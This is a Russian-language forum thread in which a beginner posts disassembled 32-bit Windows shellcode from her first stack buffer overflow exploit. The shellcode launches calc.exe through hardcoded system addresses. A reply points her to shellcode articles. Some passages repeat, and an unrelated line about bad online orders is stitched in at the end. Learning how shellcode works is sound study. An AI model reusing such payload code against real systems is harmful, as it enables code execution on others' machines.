Помогите понять шеллкод. Мой первый эксплойт!
Компьютерная безопасностьпереполнение буфера переполнение стека стек шеллкод шелл код эксплойт ассемблер
Здравствуйте! Написала мою первую программу переполнения буффера с шеллкодом, который я взяла в интернете. Программа работает, вызывается калькулятор, но сейчас мне нужно понять, что именно делает мой шеллкод( прям очень подробно разобраться!)
Вот мой шеллкод на ассемблере:
Заранее спасибо! Если можно, не объясняйте очень сложно, я на первом курсе....
Вот мой шеллкод на ассемблере:
Код:
0: eb 16 jmp 0x18
2: 5b pop ebx
3: 31 c0 xor eax,eax
5: 50 push eax
6: 53 push ebx
7: bb 4d 11 86 7c mov ebx,0x7c86114d
c: ff d3 call ebx
e: 31 c0 xor eax,eax
10: 50 push eax
11: bb ea cd 81 7c mov ebx,0x7c81cdea
16: ff d3 call ebx
18: e8 e5 ff ff ff call 0x2
1d: 63 61 6c arpl WORD PTR [ecx+0x6c],sp
20: 63 2e arpl WORD PTR [esi],bp
22: 65 78 65 gs js 0x8a
25: 00 90 90 90 90 90 add BYTE PTR [eax-0x6f6f6f70],dl
2b: 90 nop
2c: 90 nop
2d: 90 nop
2e: 90 nop
2f: 90 nop
2: 5b pop ebx
3: 31 c0 xor eax,eax
5: 50 push eax
6: 53 push ebx
7: bb 4d 11 86 7c mov ebx,0x7c86114d
c: ff d3 call ebx
e: 31 c0 xor eax,eax
10: 50 push eax
11: bb ea cd 81 7c mov ebx,0x7c81cdea
16: ff d3 call ebx
18: e8 e5 ff ff ff call 0x2
1d: 63 61 6c arpl WORD PTR [ecx+0x6c],sp
20: 63 2e arpl WORD PTR [esi],bp
22: 65 78 65 gs js 0x8a
25: 00 90 90 90 90 90 add BYTE PTR [eax-0x6f6f6f70],dl
2b: 90 nop
2c: 90 nop
2d: 90 nop
2e: 90 nop
2f: 90 nop
Добрый день.
Почитайте материалы про шеллкоды здесь:
https://codeby.net/threads/ps-inject-vnedrenie-she...
https://codeby.net/threads/astroid-generacija-shel...
Ну и там же по поиску поищите, много материалов.
Но для начинающего лучше с самого ассемблера тогда уж начать изучение ;-)
Почитайте материалы про шеллкоды здесь:
https://codeby.net/threads/ps-inject-vnedrenie-she...
https://codeby.net/threads/astroid-generacija-shel...
Ну и там же по поиску поищите, много материалов.
Но для начинающего лучше с самого ассемблера тогда уж начать изучение ;-)
Заказывал много, не приходило ничего, о чем бы я мог сказать, что оно хорошего качества, иногда с браком, иногда вообще не то, что я заказывал. Одно радует - они вполне себе возвращают деньги, если на них жаловаться.
